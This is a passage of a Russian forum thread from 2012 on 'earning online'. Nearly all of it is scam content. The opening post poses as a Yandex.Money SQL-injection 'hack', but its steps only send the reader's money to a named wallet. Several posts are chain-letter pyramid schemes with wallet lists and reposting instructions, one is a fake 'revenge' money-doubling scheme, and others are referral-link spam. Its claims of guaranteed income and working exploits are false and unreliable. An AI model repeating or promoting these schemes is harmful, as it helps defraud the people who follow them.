И на мой кошель минут через 5 пришло 400 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом pixcher'a решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 150 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 150 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.
"Как выполнить взлом яндекс денег на своем компе"
1. Для начала проходим сюда yandex.ru
2. Заводим почтовый ящик
3. Заводим яндекс счет
4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 150 рублей
5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 150 рублей
6 Переводим на этот счет 410011230542962 где мы сделали баг
7. Где сообщение получателю пишем вот это:
SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = 'melody' AND cc.content_type = 'melody_mp3' AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = '9' AND n.model_id = «0» AND singer_id = '400''
Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001493134589»
8. В название платежа пишем это:
cc.content_id
9. И потом жмем перевести
10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил вам. Проверена это уже на многих компах так что дерзайте.
Желаю удачи у вас все получится!
 
zarabotayteДата: Суббота, 14.01.2012, 01:38 | Сообщение # 24
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Всем привет.

Не занемайтесь сёрфингом или отгадыванием картинок! Сразу говорю: я не обещаю вам миллионы но заработать как минимум на оплату интернета можно! Я хочу предложить Вам возможность зарабатывать деньги, не выходя из дома, участвуя в проекте от организаторов системы «Яндекс Деньги».
Специфика работы: уделять от 2-х до нескольких часов работы в день на компьютере, при этом зарабатывая в месяц от 3000 рублей. Все, что Вам нужно делать - это:
1. Помещать объявления в Интернете (мой образец приведен ниже, но можете размещать своё собственное).
2. Проверять 2-3 раза в сутки почту и рассылать всем откликнувшимся письма.
3. Несколько раз в неделю получать на свой Интернет-кошелек (или банковский счёт) деньги, это произойдет уже после первого месяца работы (возможно и раньше - все зависит от Вас).
Единственный недостаток это первоначальные вложения в размере 77руб.
Те кто думает что это развод, барабан вам вруки и флаг на шею, а остальным вперёд зарабатывать деньги:-)

А ТЕПЕРЬ О 3 ШАГАХ:
ШАГ 1. Зарегистрируйтесь и хорошенько ознакомьтесь с системой «Яндекс.Деньги», которая находится по адресу http://money.yandex.ru , создав предварительно собственный Яndex кошелек. Выбрав оптимальный для себя вариант пополнения кошелька, внесите 90 рублей на свой кошелёк, т.к. (в разных системах за перевод взимается от 1 до 5%), а также 1% при переводе, поэтому надо вносить сумму с небольшим запасом. Варианты пополнения кошелька можете посмотреть, пройдя по ссылке «ПОЛОЖИТЬ В КОШЕЛЕК».

ШАГ 2. Выберите первый номер кошелька из нижеуказанного списка, отправьте на него 11руб.00 копеек, вписав этот номер в поле "Номер счёта получателя".
В поле «Назначение платежа» напишите – «Работа» (без кавычек).
В поле «Сообщение получателю» вписывать ничего не нужно, а в поле «Название платежа» ничего не меняйте.

Нажимаете «ПЕРЕВЕСТИ». Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите.

Далее, начиная со второго, по аналогии отправьте по 11 руб.00 копеек на следующие 6 кошельков. (НЕ ЗАБУДЬТЕ вписывать в поле «Контракт/Назначение платежа» – Работа).
P.S.: Необходимо вносить номера счетов вручную.
1. 410011261297603
2. 410011233868713
3. 410011261296201
4. 410011261295735
5. 410011261294886
6. 410011261294262
7. 410011233864048
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 11 руб.00 копеек - иначе, сетевыми модераторами (администраторами) Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход.

ВНИМАНИЕ!
После того, как Вы выполнили ШАГ 2, вычеркните из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го, 7-й - на место 6-го! А в 7-й номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!

ШАГ 3. Напишите свою подобную статью, или можете скопировать мою. Разместите эту статью на более чем 200 - 300 форумах, новостных лентах (News Groups) и специализированных сайтах о поиске работы (Например: www.job.ru, www.rabota.ru и т.д.) Делайте в этой статье любые изменения, но сохраните главную идею. Запомните, чем больше Вы разместите, тем выше будет Ваш доход, и этот доход будет напрямую зависеть от Вас. Больше размещений - больше доход (притом в геометрической прогрессии). Размещение этой статьи на 200 форумах и более, даже на самых малопосещаемых, гарантирует Вам доход 15000$ ЭТО МИНИМУМ! в течение первых двух-трех месяцев!

ПОЧЕМУ ЭТОТ ПРОЕКТ ДЕЙСТВИТЕЛЬНО РАБОТАЕТ?
Система Yandex Money заинтересована в развитии и процветании этого вида бизнеса, т.к. имеет 1% с каждого денежного перевода – очень хорошую прибыль и выгоду от переводов нескольких сотен тысяч - миллионов участников, Вы соответственно тоже. Организаторы системы контролируют все процессы этого проекта. Интернет растет, и каждый день появляются всё новые и новые пользователи. Тысячи людей со всего мира присоединяются к Интернету и читают эти объявления каждый день. Так что? Потратите ли Вы 77рублей, чтобы узнать, работает это или нет? Выбор остается за вами. И именно Вам решать, хотите ли Вы изменить свою жизнь в лучшую сторону или продолжать топтаться на одном месте. Каждый день в сети Интернета появляются от 30000 до 50000 новых пользователей, а это о чем-то говорит.

Если вы будете точно придерживаться выше перечисленных инструкций, то начнете получать намного больше денег, чем Вы зарабатывали на прежней работе, уделяя для этого несколько часов в день. Хотите, верьте, хотите, нет, но эта работа - реальная возможность зарабатывать, и совершено легально. А ваши затраты в сумме составят 77рублей. Выполняйте последовательно инструкции 3-х ШАГОВ в точности и 20 000 руб будут Вашими в течение трех-четырех месяцев!!!
По всем вопросам и пожеланиями обращайтесь в службу поддержки, на адрес электронной почты zarabotayte@yandex.ru
Желаю удачи!!!
ПОМНИТЕ ВАШЕ СЧАСТЬЕ В ВАШИХ РУКАХ!
 
Evgen2012Дата: Пятница, 20.01.2012, 21:43 | Сообщение # 25
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Заработать можно на сайте http://www.web-ip.ru/index.php?refwmid=373486345571 . Просто пройдите регистрацию, и выполняйте задания, за которые вам платят деньги, и выплачивают вам на вебмани....
 
отличникДата: Суббота, 21.01.2012, 02:33 | Сообщение # 26
Рядовой
Группа: Пользователи
Сообщений: 2
Репутация: 0
Статус: Offline
Я предлагаю Вам вещь, реально заработай
Я предлагаю Вам вещь‚ к которой и сама относилась поначалу скептически.
Но в отличие от многих подобных предложений - ЭТО ДЕЙСТВИТЕЛЬНО РАБОТАЕТ!!
Наткнулся я на это совершенно случайно‚ когда искал работу для
дополнительного заработка. Найдя статью‚ в которой говорилось‚ что можно сделать СОТНИ ТЫСЯЧ рублей всего
за ПАРУ НЕДЕЛЬ при вложении всего 70 руб.‚ я подумал‚ что это должно быть очередная фишка для лохов‚ но
решил всё-таки дочитать до конца и узнать‚ что мне предлагают: там говорилось‚ что надо послать по 10руб.
на 7 Internet-кошельков‚ которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка‚ тем самым‚
сместив список на одну строчку вверх‚ в результате чего седьмая строчка освобождается‚ куда Вы вписываете
номер своего Internet-кошелька. Затем Вы закидываете данное сообщение‚ но уже с ВАШИМИ ДАННЫМИ на седьмой
строчке‚ на 200 разных форумов. Никаких уловок. Ну‚ я поразмышлял и подумал ‚ что‚ в принципе‚ ничего не
теряю‚ кроме 70 руб.‚ и решила попробовать. Установил Internet-кошелёк‚ перечислил всем участникам акции
по 10 руб. и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 3-х дней я
зарегистрировался более чем в 100 бизнес - форумах и бесплатных досках объявлений. Прошла неделя‚ заглядываю
в свой Internet-кошелёк и‚ угадайте что!!! Поступлений никаких нет‚ вообще. А разные участники пишут‚ что за
неделю заработали кто по 750 руб.‚ кто по 450 руб.. Пиши-пропало‚ подумала я‚ попал в очередной лохотрон‚
желая заработать за пару недель десятки тысяч рублей. Ну и бросила это занятие‚ так и не дослав своё
объявление до 200 форумов‚ 70 рублей убытка не ударило по моему бюджету. Ещё через неделю заглянул в свой
Internet-кошелёк‚ смотрю‚ всего одно поступление 10 руб.. Да‚ думаю‚ дело не стоящее‚ случайно нашёлся такой
же наивный‚ как и я... Ещё через две недели я всё-таки снова открыл свой Internet-кошелёк‚ а в нём уже около
1300 руб. Откуда? Непонятная картина‚ но всё равно 1300 руб. на дороге не валяются‚ хоть это и мало‚ как
пишут предыдущие участники они за 1 месяц заработали десятки тысяч долларов. И вдруг после одного месяца
началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ‚ спустя ещё 2 недели на моём
счету уже было около 39 000 руб.. После этого я отправил свои объявления ещё более чем на 150 форумов.
Результат был ошеломляющий! По прошествии всего 2 месяцев я получил 157 000 руб.. И деньги идут каждый
день‚ каждые 10 минут на мой счёт поступает по 10-30 руб. Я был в очень плохом экономическом положении и
долго не могла найти себе подходящую работу до того‚ как наткнулся на эту статью. Я не поверил ‚ что это
работает‚ пока не начал получать переводы со всего света. Моя работа теперь - это каждый день по несколько
часов в Интернете и ВСЁ!!! А заработок такой‚ что никаким начальникам и руководителям даже не снился!!!
Теперь я расскажу Вам как это работает и почему! Я Вам обещаю‚ что если Вы будете в точности соблюдать ниже
перечисленные инструкции‚ то вы начнёте получать намного больше денег‚ чем думаете‚ не прилагая к этому
особых усилий. Согласитесь‚ что это просто и совершенно легально!!! Ваш вклад всего 70 рублей и очень высокие
шансы увеличить своё благосостояние!
ВАЖНО: это не обман и при этом Вы ничем не рискуете‚ но это РАБОТАЕТ! БЛАГОПОЛУЧИЕ ЛЮБОГО УЧАСТНИКА ПРОЕКТА
ЗАВИСИТ ОТ БЛАГОПОЛУЧИЯ КАЖДОГО ЕГО УЧАСТНИКА.
ВНИМАНИЕ!!! Прочтите это пару раз. Следуйте инструкциям в ТОЧНОСТИ и Вы неплохо заработаете в течение двух
месяцев!!! Всё это удачно работает благодаря ЧЕСТНОСТИ участников. ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
1. Зарегистрируйтесь в системе Яндекс.Деньги. Это можно сделать тут www.money.yandex.ru (извините за выражение)‚ хорошенько ознакомьтесь с данной системой‚ как она
работает‚ выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей на свой кошелёк.
Сразу возникает проблема внесения денег на счёт‚ скорее всего‚ придётся прогуляться в ближайший банк‚ лично
я пополнила через терминал оплаты сотовой связи‚ но поверьте один раз сходить для последующего реального
заработка стоит! Вообще всё на сайте расписано и понятно. Возьмите первый номер кошелька из нижеуказанного
списка‚ отправьте на него 10 руб.‚ вписав этот номер в поле «Номер счёта»; всё‚ что Вы сделали - это создали
услугу‚ и самое главное - абсолютно легально. Вы просите законный сервис‚ за который платите. Далее‚ начиная
со второго‚ по аналогии отправьте по 10 руб. на следующие 6 кошельков. И ещё номер кошельков вводите
внимательно‚ не допустите ошибки. ОБЯЗАТЕЛЬНО вписывайте в поле Контракт/назначение платежа: Пожалуйста‚
внесите меня в список Яndex кошельков
P.S. Советую вводить номер кошелька вручную!!!
1) 41001912526803
2) 41001912533199
3) 41001912546731
4) 41001944494123
5) 41001912553652
6) 41001944500067
7) 410011247367775
ПОВТОРЯЮ‚ ЧТОБЫ ПОЛУЧАТЬ ДОХОДЫ‚ НЕОБХОДИМО ОТПРАВИТЬ НА КАЖДЫЙ ИЗ ЭТИХ 7 КОШЕЛЬКОВ ПО 10 РУБЛЕЙ‚ ИНАЧЕ
СЕТЕВЫМИ МОДЕРАТОРАМИ (АДМИНИСТРАТОРАМИ) YANDEX КОШЕЛЬКОВ ВЫ ПРОСТО НЕ БУДЕТЕ ВКЛЮЧЕНЫ В ПРОЕКТ И НЕ СМОЖЕТЕ
ОБНАЛИЧИТЬ ДОХОДЫ.
Теперь ВНИМАНИЕ!!! После того‚ как Вы выполнили шаг 1‚ ШАГ 2: напишите своё подобное письмо‚ можете
скопировать моё (можно в формате txt или как Вам удобней). В скопированной статье вычеркните из списка
кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-ого‚ который Вы стёрли‚ 3-ий на
место 2-ого‚ четвёртый на место 3-его‚ 5-ый на место 4-ого‚ 6-ой на место 5-ого‚ 7-ой на место 6-ого‚
а в 7-ой номер‚ который оказался пустым‚ впишите номер ВАШЕГО кошелька!!!
3. Разместите эту статью на не менее‚ чем 200-300 форумах и новостных лентах (News Groups). Запомните‚ чем
больше Вы разместите‚ тем выше будет Ваш доход‚ и этот доход будет напрямую зависеть от Вас. Когда будете
размещать статью‚ то не пишите «Заработать легко миллион»‚ «Большие деньги за месяц» и т. п.‚ лучше
написать «Требуется менеджер‚ з/п 1000 $». Размещение этой статьи на 200 форумах‚ даже на самых
малопосещаемых‚ гарантирует Вам доход 180 000 руб. - ЭТО МИНИМУМ!!! Всего за 2 месяца!!! Больше
размещений - больше доход (при том в геометрической прогрессии). ПОМНИТЕ!!! Этот бизнес продолжает
существовать и процветать только благодаря ЧЕСТНОСТИ И СЕРЪЁЗНОСТИ УЧАСТНИКОВ. Итак‚ когда Вы достигнете
первой позиции‚ Вы будете иметь тысячи долларов просто КАК СОЗДАТЕЛЬ СПИСКА!!! Это стоит всего 70 рублей
и совсем нетрудной работы!!! Главное - это РАБОТАЕТ!!! Делайте это сейчас‚ не откладывая на завтра‚ время
- деньги!!! Но поработать всё же придётся. Необходимо заинтересовать людей. Для этого необходимо
воспользоваться рассылкой. Размещением объявлений на специализированных сайтах о поисках работы‚ форумах‚
досках объявлений. А тут всё в ВАШИХ руках‚ ДЕРЗАЙТЕ!!! Ведь ничего‚ кроме 70 рублей вы не теряете!!!
А если вдруг не получится‚ а если этот бизнес рухнет‚ и никто мне денег не пришлёт? - ЭТО СТРОКА ДЛЯ
ПЕССИМИСТОВ. Ну и что!!! Каждый день в Интернете появляются от 20000 до 50000 новых пользователей. По
прогнозам специалистов только в России к 2008 году количество пользователей Интернета увеличится с нынешних
9 млн. пользователей до 21 млн.!!! Ну‚ и последнее‚ это действительно великая аксиома - чтобы получить
что-то‚ надо дать что-то‚ а чтобы получить ещё больше‚ надо дать ещё больше! Убедитесь в этом сами...
Удачи Вам!!А теперь я Вам объясню‚ почему Вы в любом случае ничего не теряете‚ а ТОЛЬКО ВЫИГРЫВАЕ
ТЕ!!! Скажем‚ из 200 размещений я получу только 5 ответов (очень низкая цифра)‚ значит‚ я сделаю 50 рублей‚
находясь на 7 позиции в списке. Теперь эти 5 людей делают опять же МИНИМУМ 200 размещений с моим кошельком
на 6-ой позиции‚ и только 5 людей отвечают тем первым 5 - это уже 250 рублей. Дальше эти 25 людей делают по
200 размещений с моим кошельком на 5 строчке и только 5 отвечают - мой доход 1 250 рублей. Теперь эти 125
людей‚ разместив и получив только по 5 ответов‚ дают мне 6 250 рублей прибыли (я на 4 позиции). Дальше
смешнее: эти 625 людей делают по минимум 200 размещений со мной на 3 строчке и только 5 людей отвечают -
это 31250 рублей. Самое интересное это то‚ что эти 3 125 людей сделают ещё по 200 размещений‚ ну а если
им ответят только 5 людей‚ то я уже получаю 156 250 рублей (я на 2-ой позиции). Теперь ВНИМАНИЕ: эти 15 625
людей сделают ещё по 200 размещений‚ им отвечают 5 человек - это 781 250 рублей и так далее!!! Не правда ли
внушительные цифры? И это всё за первоначальный вклад в 70 рублей!!! Вы себе можете представить‚ что тысячи
людей со всего мира присоединяются к Интернету и читают эти статьи каждый день‚ так же как и Вы сейчас
читаете эту статью!!! Так что? Потратите ли Вы 70 рублей‚ чтобы узнать работает ли это??? И последнее‚ на
мой взгляд‚ самое главное: КАК СНИМАТЬ ДЕНЬГИ С ИНТЕРНЕТ-КОШЕЛЬКА? Нажимаешь «снять деньги»‚ далее выбираешь
подходящий банк твоего города‚ лучше выбирай банк‚ где не надо открывать счёт‚ набираешь далее данные
владельца программы ИНТЕРНЕТ-КОШЕЛЬКА‚ и набираешь данные‚ кто будет снимать деньги в банке (там требуются
паспортные данные‚ пишите правду‚ иначе не дадут денег).
 
LexaBДата: Понедельник, 23.01.2012, 21:37 | Сообщение # 27
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
тут можно зароботать хорошие деньги http://www.zipmonster.ru/reg14414
 
kirill121Дата: Среда, 25.01.2012, 18:49 | Сообщение # 28
Рядовой
Группа: Пользователи
Сообщений: 3
Репутация: 0
Статус: Offline
Здесь можно реально заработать это финансовый рынок система полностью автоматизирована ваша задача заключаеться только в том что нужно каждый день авторизироваться у брокера авторизация занимает буквально 1-2 минуты Вашего времени при регистрации вам дают 10$ и 2-3$каждый день ,здесь не нужно вкладывать свои деньги система платит Вам кому интересно вот вот ссылка http://exactraw.ru/?ref=GTD7CUyTuH
http://idmoney.ru/?ref=PaCcZoFeh6
http://exactstock.ru/?ref=huoYQWAnHP
http://exactmoney.ru/?ref=tmLJ13GsZw
http://exactgold.ru/?ref=U8SUjDNtxf

Добавлено (25.01.2012, 18:49)
---------------------------------------------
Здесь можно реально заработать это финансовый рынок система полностью автоматизирована ваша задача заключаеться только в том что нужно каждый день авторизироваться у брокера авторизация занимает буквально 1-2 минуты Вашего времени при регистрации вам дают 10$ и 2-3$каждый день ,здесь не нужно вкладывать свои деньги система платит Вам кому интересно вот вот ссылка http://exactraw.ru/?ref=GTD7CUyTuH
http://idmoney.ru/?ref=PaCcZoFeh6
http://exactstock.ru/?ref=huoYQWAnHP
http://exactmoney.ru/?ref=tmLJ13GsZw
http://exactgold.ru/?ref=U8SUjDNtxf

 
zloydanjaДата: Воскресенье, 05.02.2012, 09:21 | Сообщение # 29
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
<a onmouseover="window.status='тут можно заработать'; return true" onmouseout="window.status=''; return true" href="http://www.igra3k.ru/ref/id/728159">тут можно заработать</a>
 
PioneerДата: Понедельник, 13.02.2012, 03:02 | Сообщение # 30
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Здравствуйте друзья!Заработайте 600 рублей в час. Никому не секрет, что в системе "Яндекс.деньги" существуют кошельки "ЛОХОТРОНЫ", и наверняка многие уже попадались на этот "бесплатный сыр". Но... Есть один способ наказать лохотронщика! Прочитал я как то в инете, что есть кошельки, на которые можно послать любую сумму, и тебе вернется примерно в 2 раза больше, чем ты отошлёшь. Понятное дело что это "Лохотрон", но я решил попробовать, и послал 100р, деньги смешные и расстаться не так жалко... Как же я удивился когда спустя 3 часа обнаружил у себя в кошельке 160р, это был настоящий сюрприз. Сразу в голову начали лезть мысли, что я стану богат!!! Я не раздумывая послал эти 160р на тот же самый кошелек и спустя 3 часа вновь увидел на своем счету деньги. На этот раз там было 320р. Ликуя в душе я отослал всю сумму и назад мне пришло что?...Правильно, Фиг с маслом!...Спустя некоторое время я понял как работает их система. Там есть специальная программа. Ты отсылаешь любую сумму до 300р и тебе возвращается примерно в 2 раза больше. как только отослал 301р и выше - система их съедает. ЭТО Я К ТОМУ ЧТО, если быть умнее и слать аккуратно, то можно их обманывать. Даже не пытайтесь слать 301 и больше. Их вам не вернут. Вот уже пару недель я систематически отсылаю туда по ровно 300р и получаю около 500 обратно. Уже заработал больше 5000р.
Этих денег мне вполне хватает на оплату интернета и других услуг (плюс я студент). Этим занимаются еще пара моих знакомых которым я по секрету рассказал. Теперь поняв, что ЛОХОТРОНЩИКИ обирают народ на гораздо большие деньги чем мы отбираем у них, я решил поделиться этим секретом с ВАМИ. Вот этот кошелек 410011282790793.
Итак вам надо делать следующее: Если у ВАС НЕТ Яндекс кошелька:"money.yandex.ru" (А если есть так ВПЕРЕД!!!) Регистрируетесь на Yandex-e в разделе деньги, получаете там кошелек с номером, приблизительно с таким же как я указал выше. Идете в ближайший пункт продажи карточек для пополнения кошелька яндекс.деньги или через платежный терминал, пополняете СВОЙ кошелек. Как только видите что деньги поступили на ваш счет, начинаете отсылать деньги на этот кошелек (410011282790793). Как снимать деньги с кошелька написано в меню вашего кошелька.
Спросите зачем же я все это написал??? Все просто, - из мести. Я хочу разорить их! Как они меня кинули! Я НЕ забыл… По секрету: я присмотрел другой такой же кошелечек… Так что без денег не останусь! А месть – сладкое блюдо! Снимите у них ВСЕ! и не забывайте Отсылать не более 300р!!!
 
Форум » Прочее » Курилка » Как заработать в инете
  • Страница 1 из 5
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
Поиск:

Copyright MyCorp © 2024